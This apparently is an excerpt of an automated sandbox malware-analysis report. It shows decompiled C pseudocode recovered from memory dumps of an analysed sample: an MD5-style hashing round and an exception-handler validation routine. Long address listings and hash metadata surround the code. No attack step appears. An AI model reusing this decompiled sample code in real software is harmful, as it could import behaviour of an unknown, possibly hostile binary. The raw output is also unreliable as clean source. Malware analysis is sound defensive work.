                                                                                                                                                                                              				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
                                                                                                                                                                                              				asm("rol eax, 0x6");
                                                                                                                                                                                              				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
                                                                                                                                                                                              				asm("rol edx, 0xa");
                                                                                                                                                                                              				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
                                                                                                                                                                                              				_t400 = _a4;
                                                                                                                                                                                              				asm("rol esi, 0xf");
                                                                                                                                                                                              				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
                                                                                                                                                                                              				 *_t400 =  *_t400 + _t259;
                                                                                                                                                                                              				asm("ror eax, 0xb");
                                                                                                                                                                                              				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
                                                                                                                                                                                              				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
                                                                                                                                                                                              				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
                                                                                                                                                                                              				return memset( &_v76, 0, 0x40);
                                                                                                                                                                                              			}


































































































                                                                                                                                                                                              0x00df5923
                                                                                                                                                                                              0x00df592e
                                                                                                                                                                                              0x00df5931
                                                                                                                                                                                              0x00df5934
                                                                                                                                                                                              0x00df5935
                                                                                                                                                                                              0x00df5953
                                                                                                                                                                                              0x00df5955
                                                                                                                                                                                              0x00df5958
                                                                                                                                                                                              0x00df595b
                                                                                                                                                                                              0x00df595b
                                                                                                                                                                                              0x00df595e
                                                                                                                                                                                              0x00df595e
                                                                                                                                                                                              0x00df5961
                                                                                                                                                                                              0x00df5961
                                                                                                                                                                                              0x00df5964
                                                                                                                                                                                              0x00df5964
                                                                                                                                                                                              0x00df5981
                                                                                                                                                                                              0x00df5984
                                                                                                                                                                                              0x00df599a
                                                                                                                                                                                              0x00df599d
                                                                                                                                                                                              0x00df59b7
                                                                                                                                                                                              0x00df59ba
                                                                                                                                                                                              0x00df59d0
                                                                                                                                                                                              0x00df59d3
                                                                                                                                                                                              0x00df59d5
                                                                                                                                                                                              0x00df59ed
                                                                                                                                                                                              0x00df59f0
                                                                                                                                                                                              0x00df59f3
                                                                                                                                                                                              0x00df5a0b
                                                                                                                                                                                              0x00df5a0e
                                                                                                                                                                                              0x00df5a28
                                                                                                                                                                                              0x00df5a2b
                                                                                                                                                                                              0x00df5a41
                                                                                                                                                                                              0x00df5a44
                                                                                                                                                                                              0x00df5a46
                                                                                                                                                                                              0x00df5a5e
                                                                                                                                                                                              0x00df5a63
                                                                                                                                                                                              0x00df5a66
                                                                                                                                                                                              0x00df5a7c
                                                                                                                                                                                              0x00df5a7f
                                                                                                                                                                                              0x00df5a99
                                                                                                                                                                                              0x00df5a9c
                                                                                                                                                                                              0x00df5ab2
                                                                                                                                                                                              0x00df5ab5
                                                                                                                                                                                              0x00df5ab7
                                                                                                                                                                                              0x00df5ad2
                                                                                                                                                                                              0x00df5ad5
                                                                                                                                                                                              0x00df5aec
                                                                                                                                                                                              0x00df5aef
                                                                                                                                                                                              0x00df5af3
                                                                                                                                                                                              0x00df5b0c
                                                                                                                                                                                              0x00df5b0f
                                                                                                                                                                                              0x00df5b11
                                                                                                                                                                                              0x00df5b14
                                                                                                                                                                                              0x00df5b2f
                                                                                                                                                                                              0x00df5b32
                                                                                                                                                                                              0x00df5b4b
                                                                                                                                                                                              0x00df5b4e
                                                                                                                                                                                              0x00df5b5e
                                                                                                                                                                                              0x00df5b61
                                                                                                                                                                                              0x00df5b79
                                                                                                                                                                                              0x00df5b7c
                                                                                                                                                                                              0x00df5b96
                                                                                                                                                                                              0x00df5b99
                                                                                                                                                                                              0x00df5bb1
                                                                                                                                                                                              0x00df5bb4
                                                                                                                                                                                              0x00df5bca
                                                                                                                                                                                              0x00df5bcd
                                                                                                                                                                                              0x00df5be5
                                                                                                                                                                                              0x00df5be8
                                                                                                                                                                                              0x00df5c00
                                                                                                                                                                                              0x00df5c03
                                                                                                                                                                                              0x00df5c1d
                                                                                                                                                                                              0x00df5c20
                                                                                                                                                                                              0x00df5c36
                                                                                                                                                                                              0x00df5c39
                                                                                                                                                                                              0x00df5c51
                                                                                                                                                                                              0x00df5c54
                                                                                                                                                                                              0x00df5c6e
                                                                                                                                                                                              0x00df5c71
                                                                                                                                                                                              0x00df5c89
                                                                                                                                                                                              0x00df5c8c
                                                                                                                                                                                              0x00df5ca2
                                                                                                                                                                                              0x00df5ca5
                                                                                                                                                                                              0x00df5cbd
                                                                                                                                                                                              0x00df5cc0
                                                                                                                                                                                              0x00df5cd8
                                                                                                                                                                                              0x00df5cdb
                                                                                                                                                                                              0x00df5ced
                                                                                                                                                                                              0x00df5cf0
                                                                                                                                                                                              0x00df5d02
                                                                                                                                                                                              0x00df5d05
                                                                                                                                                                                              0x00df5d17
                                                                                                                                                                                              0x00df5d1a
                                                                                                                                                                                              0x00df5d1e
                                                                                                                                                                                              0x00df5d2e
                                                                                                                                                                                              0x00df5d31
                                                                                                                                                                                              0x00df5d3f
                                                                                                                                                                                              0x00df5d42
                                                                                                                                                                                              0x00df5d54
                                                                                                                                                                                              0x00df5d57
                                                                                                                                                                                              0x00df5d6b
                                                                                                                                                                                              0x00df5d6e
                                                                                                                                                                                              0x00df5d70
                                                                                                                                                                                              0x00df5d80
                                                                                                                                                                                              0x00df5d83
                                                                                                                                                                                              0x00df5d95
                                                                                                                                                                                              0x00df5d98
                                                                                                                                                                                              0x00df5da6
                                                                                                                                                                                              0x00df5da9
                                                                                                                                                                                              0x00df5dbb
                                                                                                                                                                                              0x00df5dbe
                                                                                                                                                                                              0x00df5dc2
                                                                                                                                                                                              0x00df5dd2
                                                                                                                                                                                              0x00df5dd5
                                                                                                                                                                                              0x00df5de7
                                                                                                                                                                                              0x00df5dea
                                                                                                                                                                                              0x00df5df8
                                                                                                                                                                                              0x00df5dfb
                                                                                                                                                                                              0x00df5e0d
                                                                                                                                                                                              0x00df5e10
                                                                                                                                                                                              0x00df5e22
                                                                                                                                                                                              0x00df5e25
                                                                                                                                                                                              0x00df5e39
                                                                                                                                                                                              0x00df5e3c
                                                                                                                                                                                              0x00df5e50
                                                                                                                                                                                              0x00df5e53
                                                                                                                                                                                              0x00df5e67
                                                                                                                                                                                              0x00df5e6a
                                                                                                                                                                                              0x00df5e7e
                                                                                                                                                                                              0x00df5e81
                                                                                                                                                                                              0x00df5e95
                                                                                                                                                                                              0x00df5e98
                                                                                                                                                                                              0x00df5eac
                                                                                                                                                                                              0x00df5eb1
                                                                                                                                                                                              0x00df5ec3
                                                                                                                                                                                              0x00df5ec6
                                                                                                                                                                                              0x00df5eda
                                                                                                                                                                                              0x00df5edd
                                                                                                                                                                                              0x00df5ef1
                                                                                                                                                                                              0x00df5ef4
                                                                                                                                                                                              0x00df5f0a
                                                                                                                                                                                              0x00df5f0d
                                                                                                                                                                                              0x00df5f21
                                                                                                                                                                                              0x00df5f24
                                                                                                                                                                                              0x00df5f36
                                                                                                                                                                                              0x00df5f39
                                                                                                                                                                                              0x00df5f4d
                                                                                                                                                                                              0x00df5f50
                                                                                                                                                                                              0x00df5f64
                                                                                                                                                                                              0x00df5f67
                                                                                                                                                                                              0x00df5f7b
                                                                                                                                                                                              0x00df5f84
                                                                                                                                                                                              0x00df5f87
                                                                                                                                                                                              0x00df5f90
                                                                                                                                                                                              0x00df5f99
                                                                                                                                                                                              0x00df5fa1
                                                                                                                                                                                              0x00df5fa9
                                                                                                                                                                                              0x00df5fb3
                                                                                                                                                                                              0x00df5fc8

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: memset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2221118986-0
                                                                                                                                                                                              • Opcode ID: 4017203efa24db58f9d54351c93f765915507c990ab3cf859a8473f221a58c33
                                                                                                                                                                                              • Instruction ID: 55eeb10ea3ba3bd461a6fb2cad5fb6effc4efd086e25345a562c3ac82da2ef01
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4017203efa24db58f9d54351c93f765915507c990ab3cf859a8473f221a58c33
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5922857BE516169BDB08CA95CC805E9B3E3BBC832471F9139C919E3305EE797A0786D0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E00A823F5(long _a4) {
                                                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                                                              				signed int _v16;
                                                                                                                                                                                              				short* _v32;
                                                                                                                                                                                              				void _v36;
                                                                                                                                                                                              				void* _t57;
                                                                                                                                                                                              				signed int _t58;
                                                                                                                                                                                              				signed int _t61;
                                                                                                                                                                                              				signed int _t62;
                                                                                                                                                                                              				void* _t63;
                                                                                                                                                                                              				signed int* _t68;
                                                                                                                                                                                              				intOrPtr* _t69;
                                                                                                                                                                                              				intOrPtr* _t71;
                                                                                                                                                                                              				intOrPtr _t72;
                                                                                                                                                                                              				intOrPtr _t75;
                                                                                                                                                                                              				void* _t76;
                                                                                                                                                                                              				signed int _t77;
                                                                                                                                                                                              				void* _t78;
                                                                                                                                                                                              				void _t80;
                                                                                                                                                                                              				signed int _t81;
                                                                                                                                                                                              				signed int _t84;
                                                                                                                                                                                              				signed int _t86;
                                                                                                                                                                                              				short* _t87;
                                                                                                                                                                                              				void* _t89;
                                                                                                                                                                                              				signed int* _t90;
                                                                                                                                                                                              				long _t91;
                                                                                                                                                                                              				signed int _t93;
                                                                                                                                                                                              				signed int _t94;
                                                                                                                                                                                              				signed int _t100;
                                                                                                                                                                                              				signed int _t102;
                                                                                                                                                                                              				void* _t104;
                                                                                                                                                                                              				long _t108;
                                                                                                                                                                                              				signed int _t110;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t108 = _a4;
                                                                                                                                                                                              				_t76 =  *(_t108 + 8);
                                                                                                                                                                                              				if((_t76 & 0x00000003) != 0) {
                                                                                                                                                                                              					L3:
                                                                                                                                                                                              					return 0;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_a4 =  *[fs:0x4];
                                                                                                                                                                                              				_v8 =  *[fs:0x8];
                                                                                                                                                                                              				if(_t76 < _v8 || _t76 >= _a4) {
                                                                                                                                                                                              					_t102 =  *(_t108 + 0xc);
                                                                                                                                                                                              					__eflags = _t102 - 0xffffffff;
                                                                                                                                                                                              					if(_t102 != 0xffffffff) {
                                                                                                                                                                                              						_t91 = 0;
                                                                                                                                                                                              						__eflags = 0;
                                                                                                                                                                                              						_a4 = 0;
                                                                                                                                                                                              						_t57 = _t76;
                                                                                                                                                                                              						do {
                                                                                                                                                                                              							_t80 =  *_t57;
                                                                                                                                                                                              							__eflags = _t80 - 0xffffffff;
                                                                                                                                                                                              							if(_t80 == 0xffffffff) {
                                                                                                                                                                                              								goto L9;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							__eflags = _t80 - _t91;
                                                                                                                                                                                              							if(_t80 >= _t91) {
                                                                                                                                                                                              								L20:
                                                                                                                                                                                              								_t63 = 0;
                                                                                                                                                                                              								L60:
                                                                                                                                                                                              								return _t63;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							L9:
                                                                                                                                                                                              							__eflags =  *(_t57 + 4);
                                                                                                                                                                                              							if( *(_t57 + 4) != 0) {
                                                                                                                                                                                              								_t12 =  &_a4;
                                                                                                                                                                                              								 *_t12 = _a4 + 1;
                                                                                                                                                                                              								__eflags =  *_t12;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t91 = _t91 + 1;
                                                                                                                                                                                              							_t57 = _t57 + 0xc;
                                                                                                                                                                                              							__eflags = _t91 - _t102;
                                                                                                                                                                                              						} while (_t91 <= _t102);
                                                                                                                                                                                              						__eflags = _a4;
                                                                                                                                                                                              						if(_a4 == 0) {
                                                                                                                                                                                              							L15:
                                                                                                                                                                                              							_t81 =  *0xa84178;
                                                                                                                                                                                              							_t110 = _t76 & 0xfffff000;
                                                                                                                                                                                              							_t58 = 0;
                                                                                                                                                                                              							__eflags = _t81;
                                                                                                                                                                                              							if(_t81 <= 0) {
                                                                                                                                                                                              								L18:
                                                                                                                                                                                              								_t104 = _t102 | 0xffffffff;
                                                                                                                                                                                              								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                                                                                                                                                                              								__eflags = _t61;
                                                                                                                                                                                              								if(_t61 < 0) {
                                                                                                                                                                                              									_t62 = 0;
                                                                                                                                                                                              									__eflags = 0;
                                                                                                                                                                                              								} else {
                                                                                                                                                                                              									_t62 = _a4;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								__eflags = _t62;
                                                                                                                                                                                              								if(_t62 == 0) {
                                                                                                                                                                                              									L59:
                                                                                                                                                                                              									_t63 = _t104;
                                                                                                                                                                                              									goto L60;
                                                                                                                                                                                              								} else {
                                                                                                                                                                                              									__eflags = _v12 - 0x1000000;
                                                                                                                                                                                              									if(_v12 != 0x1000000) {
                                                                                                                                                                                              										goto L59;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									__eflags = _v16 & 0x000000cc;
                                                                                                                                                                                              									if((_v16 & 0x000000cc) == 0) {
                                                                                                                                                                                              										L46:
                                                                                                                                                                                              										_t63 = 1;
                                                                                                                                                                                              										 *0xa841c0 = 1;
                                                                                                                                                                                              										__eflags =  *0xa841c0;
                                                                                                                                                                                              										if( *0xa841c0 != 0) {
                                                                                                                                                                                              											goto L60;
                                                                                                                                                                                              										}
                                                                                                                                                                                              										_t84 =  *0xa84178;
                                                                                                                                                                                              										__eflags = _t84;
                                                                                                                                                                                              										_t93 = _t84;
                                                                                                                                                                                              										if(_t84 <= 0) {
                                                                                                                                                                                              											L51:
                                                                                                                                                                                              											__eflags = _t93;
                                                                                                                                                                                              											if(_t93 != 0) {
                                                                                                                                                                                              												L58:
                                                                                                                                                                                              												 *0xa841c0 = 0;
                                                                                                                                                                                              												goto L5;
                                                                                                                                                                                              											}
                                                                                                                                                                                              											_t77 = 0xf;
                                                                                                                                                                                              											__eflags = _t84 - _t77;
                                                                                                                                                                                              											if(_t84 <= _t77) {
                                                                                                                                                                                              												_t77 = _t84;
                                                                                                                                                                                              											}
                                                                                                                                                                                              											_t94 = 0;
                                                                                                                                                                                              											__eflags = _t77;
                                                                                                                                                                                              											if(_t77 < 0) {
                                                                                                                                                                                              												L56:
                                                                                                                                                                                              												__eflags = _t84 - 0x10;
                                                                                                                                                                                              												if(_t84 < 0x10) {
                                                                                                                                                                                              													_t86 = _t84 + 1;
                                                                                                                                                                                              													__eflags = _t86;
                                                                                                                                                                                              													 *0xa84178 = _t86;
                                                                                                                                                                                              												}
                                                                                                                                                                                              												goto L58;
                                                                                                                                                                                              											} else {
                                                                                                                                                                                              												do {
                                                                                                                                                                                              													_t68 = 0xa84180 + _t94 * 4;
                                                                                                                                                                                              													_t94 = _t94 + 1;
                                                                                                                                                                                              													__eflags = _t94 - _t77;
                                                                                                                                                                                              													 *_t68 = _t110;
                                                                                                                                                                                              													_t110 =  *_t68;
                                                                                                                                                                                              												} while (_t94 <= _t77);
                                                                                                                                                                                              												goto L56;
                                                                                                                                                                                              											}
                                                                                                                                                                                              										}
                                                                                                                                                                                              										_t69 = 0xa8417c + _t84 * 4;
                                                                                                                                                                                              										while(1) {
                                                                                                                                                                                              											__eflags =  *_t69 - _t110;
                                                                                                                                                                                              											if( *_t69 == _t110) {
                                                                                                                                                                                              												goto L51;
                                                                                                                                                                                              											}
                                                                                                                                                                                              											_t93 = _t93 - 1;
                                                                                                                                                                                              											_t69 = _t69 - 4;
                                                                                                                                                                                              											__eflags = _t93;
                                                                                                                                                                                              											if(_t93 > 0) {
                                                                                                                                                                                              												continue;
                                                                                                                                                                                              											}
                                                                                                                                                                                              											goto L51;
                                                                                                                                                                                              										}
                                                                                                                                                                                              										goto L51;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t87 = _v32;
                                                                                                                                                                                              									__eflags =  *_t87 - 0x5a4d;
                                                                                                                                                                                              									if( *_t87 != 0x5a4d) {
                                                                                                                                                                                              										goto L59;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                                                                                                                                                              									__eflags =  *_t71 - 0x4550;
                                                                                                                                                                                              									if( *_t71 != 0x4550) {
                                                                                                                                                                                              										goto L59;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                                                                                                                                                              									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                                                                                                                                                              										goto L59;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t78 = _t76 - _t87;
                                                                                                                                                                                              									__eflags =  *((short*)(_t71 + 6));
                                                                                                                                                                                              									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                                                                                                                                                              									if( *((short*)(_t71 + 6)) <= 0) {
                                                                                                                                                                                              										goto L59;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                                                                                                                                                              									__eflags = _t78 - _t72;
                                                                                                                                                                                              									if(_t78 < _t72) {
                                                                                                                                                                                              										goto L46;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                                                                                                                                                              									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                                                                                                                                                              										goto L46;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                                                                                                                                                              									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                                                                                                                                                              										goto L20;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									goto L46;
                                                                                                                                                                                              								}
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								goto L16;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							while(1) {
                                                                                                                                                                                              								L16:
                                                                                                                                                                                              								__eflags =  *((intOrPtr*)(0xa84180 + _t58 * 4)) - _t110;
                                                                                                                                                                                              								if( *((intOrPtr*)(0xa84180 + _t58 * 4)) == _t110) {
                                                                                                                                                                                              									break;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t58 = _t58 + 1;
                                                                                                                                                                                              								__eflags = _t58 - _t81;
                                                                                                                                                                                              								if(_t58 < _t81) {
                                                                                                                                                                                              									continue;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								goto L18;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							__eflags = _t58;
                                                                                                                                                                                              							if(_t58 <= 0) {
                                                                                                                                                                                              								goto L5;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							 *0xa841c0 = 1;
                                                                                                                                                                                              							__eflags =  *0xa841c0;
                                                                                                                                                                                              							if( *0xa841c0 != 0) {
                                                                                                                                                                                              								goto L5;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							__eflags =  *((intOrPtr*)(0xa84180 + _t58 * 4)) - _t110;
                                                                                                                                                                                              							if( *((intOrPtr*)(0xa84180 + _t58 * 4)) == _t110) {
                                                                                                                                                                                              								L32:
                                                                                                                                                                                              								_t100 = 0;
                                                                                                                                                                                              								__eflags = _t58;
                                                                                                                                                                                              								if(_t58 < 0) {
                                                                                                                                                                                              									L34:
                                                                                                                                                                                              									 *0xa841c0 = 0;
                                                                                                                                                                                              									goto L5;
                                                                                                                                                                                              								} else {
                                                                                                                                                                                              									goto L33;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								do {
                                                                                                                                                                                              									L33:
                                                                                                                                                                                              									_t90 = 0xa84180 + _t100 * 4;
                                                                                                                                                                                              									_t100 = _t100 + 1;
                                                                                                                                                                                              									__eflags = _t100 - _t58;
                                                                                                                                                                                              									 *_t90 = _t110;
                                                                                                                                                                                              									_t110 =  *_t90;
                                                                                                                                                                                              								} while (_t100 <= _t58);
                                                                                                                                                                                              								goto L34;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t58 = _t81 - 1;
                                                                                                                                                                                              							__eflags = _t58;
                                                                                                                                                                                              							if(_t58 < 0) {
                                                                                                                                                                                              								L28:
                                                                                                                                                                                              								__eflags = _t81 - 0x10;
                                                                                                                                                                                              								if(_t81 < 0x10) {
                                                                                                                                                                                              									_t81 = _t81 + 1;
                                                                                                                                                                                              									__eflags = _t81;
                                                                                                                                                                                              									 *0xa84178 = _t81;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t58 = _t81 - 1;
                                                                                                                                                                                              								goto L32;
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								goto L25;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							while(1) {
                                                                                                                                                                                              								L25:
                                                                                                                                                                                              								__eflags =  *((intOrPtr*)(0xa84180 + _t58 * 4)) - _t110;
                                                                                                                                                                                              								if( *((intOrPtr*)(0xa84180 + _t58 * 4)) == _t110) {
                                                                                                                                                                                              									break;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t58 = _t58 - 1;
                                                                                                                                                                                              								__eflags = _t58;
                                                                                                                                                                                              								if(_t58 >= 0) {
                                                                                                                                                                                              									continue;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								break;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							__eflags = _t58;
                                                                                                                                                                                              							if(__eflags >= 0) {
                                                                                                                                                                                              								if(__eflags == 0) {
                                                                                                                                                                                              									goto L34;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								goto L32;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							goto L28;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                                                                                                                                                              						__eflags = _t75 - _v8;
                                                                                                                                                                                              						if(_t75 < _v8) {
                                                                                                                                                                                              							goto L20;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						__eflags = _t75 - _t108;
                                                                                                                                                                                              						if(_t75 >= _t108) {
                                                                                                                                                                                              							goto L20;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						goto L15;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					L5:
                                                                                                                                                                                              					_t63 = 1;
                                                                                                                                                                                              					goto L60;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					goto L3;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}




































                                                                                                                                                                                              0x00a823ff
                                                                                                                                                                                              0x00a82402
                                                                                                                                                                                              0x00a82408
                                                                                                                                                                                              0x00a82426
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a82426
                                                                                                                                                                                              0x00a82410
                                                                                                                                                                                              0x00a82419
                                                                                                                                                                                              0x00a8241f
                                                                                                                                                                                              0x00a8242e
                                                                                                                                                                                              0x00a82431
                                                                                                                                                                                              0x00a82434
                                                                                                                                                                                              0x00a8243e
                                                                                                                                                                                              0x00a8243e
                                                                                                                                                                                              0x00a82440
                                                                                                                                                                                              0x00a82443
                                                                                                                                                                                              0x00a82445
                                                                                                                                                                                              0x00a82445
                                                                                                                                                                                              0x00a82447
                                                                                                                                                                                              0x00a8244a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a8244c
                                                                                                                                                                                              0x00a8244e
                                                                                                                                                                                              0x00a824b4
                                                                                                                                                                                              0x00a824b4
                                                                                                                                                                                              0x00a82612
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a82612
                                                                                                                                                                                              0x00a82450
                                                                                                                                                                                              0x00a82450
                                                                                                                                                                                              0x00a82454
                                                                                                                                                                                              0x00a82456
                                                                                                                                                                                              0x00a82456
                                                                                                                                                                                              0x00a82456
                                                                                                                                                                                              0x00a82456
                                                                                                                                                                                              0x00a82459
                                                                                                                                                                                              0x00a8245a
                                                                                                                                                                                              0x00a8245d
                                                                                                                                                                                              0x00a8245d
                                                                                                                                                                                              0x00a82461
                                                                                                                                                                                              0x00a82465
                                                                                                                                                                                              0x00a82473
                                                                                                                                                                                              0x00a82473
                                                                                                                                                                                              0x00a8247b
                                                                                                                                                                                              0x00a82481
                                                                                                                                                                                              0x00a82483
                                                                                                                                                                                              0x00a82485
                                                                                                                                                                                              0x00a82495
                                                                                                                                                                                              0x00a824a2
                                                                                                                                                                                              0x00a824a6
                                                                                                                                                                                              0x00a824ab
                                                                                                                                                                                              0x00a824ad
                                                                                                                                                                                              0x00a8252b
                                                                                                                                                                                              0x00a8252b
                                                                                                                                                                                              0x00a824af
                                                                                                                                                                                              0x00a824af
                                                                                                                                                                                              0x00a824af
                                                                                                                                                                                              0x00a8252d
                                                                                                                                                                                              0x00a8252f
                                                                                                                                                                                              0x00a82610
                                                                                                                                                                                              0x00a82610
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a82535
                                                                                                                                                                                              0x00a82535
                                                                                                                                                                                              0x00a8253c
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a82542
                                                                                                                                                                                              0x00a82546
                                                                                                                                                                                              0x00a825a2
                                                                                                                                                                                              0x00a825a4
                                                                                                                                                                                              0x00a825ac
                                                                                                                                                                                              0x00a825ae
                                                                                                                                                                                              0x00a825b0
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a825b2
                                                                                                                                                                                              0x00a825b8
                                                                                                                                                                                              0x00a825ba
                                                                                                                                                                                              0x00a825bc
                                                                                                                                                                                              0x00a825d1
                                                                                                                                                                                              0x00a825d1
                                                                                                                                                                                              0x00a825d3
                                                                                                                                                                                              0x00a82602
                                                                                                                                                                                              0x00a82609
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a82609
                                                                                                                                                                                              0x00a825d7
                                                                                                                                                                                              0x00a825d8
                                                                                                                                                                                              0x00a825da
                                                                                                                                                                                              0x00a825dc
                                                                                                                                                                                              0x00a825dc
                                                                                                                                                                                              0x00a825de
                                                                                                                                                                                              0x00a825e0
                                                                                                                                                                                              0x00a825e2
                                                                                                                                                                                              0x00a825f6
                                                                                                                                                                                              0x00a825f6
                                                                                                                                                                                              0x00a825f9
                                                                                                                                                                                              0x00a825fb
                                                                                                                                                                                              0x00a825fb
                                                                                                                                                                                              0x00a825fc
                                                                                                                                                                                              0x00a825fc
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a825e4
                                                                                                                                                                                              0x00a825e4
                                                                                                                                                                                              0x00a825e4
                                                                                                                                                                                              0x00a825ed
                                                                                                                                                                                              0x00a825ee
                                                                                                                                                                                              0x00a825f0
                                                                                                                                                                                              0x00a825f2
                                                                                                                                                                                              0x00a825f2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a825e4
                                                                                                                                                                                              0x00a825e2
                                                                                                                                                                                              0x00a825be
                                                                                                                                                                                              0x00a825c5
                                                                                                                                                                                              0x00a825c5
                                                                                                                                                                                              0x00a825c7
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a825c9
                                                                                                                                                                                              0x00a825ca
                                                                                                                                                                                              0x00a825cd
                                                                                                                                                                                              0x00a825cf
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a825cf
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a825c5
                                                                                                                                                                                              0x00a82548
                                                                                                                                                                                              0x00a8254b
                                                                                                                                                                                              0x00a82550
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a82559
                                                                                                                                                                                              0x00a8255b
                                                                                                                                                                                              0x00a82561
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a82567
                                                                                                                                                                                              0x00a8256d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a82573
                                                                                                                                                                                              0x00a82575
                                                                                                                                                                                              0x00a8257e
                                                                                                                                                                                              0x00a82582
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a82588
                                                                                                                                                                                              0x00a8258b
                                                                                                                                                                                              0x00a8258d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a82594
                                                                                                                                                                                              0x00a82596
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a82598
                                                                                                                                                                                              0x00a8259c
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a8259c
                                                                                                                                                                                              0x00000000
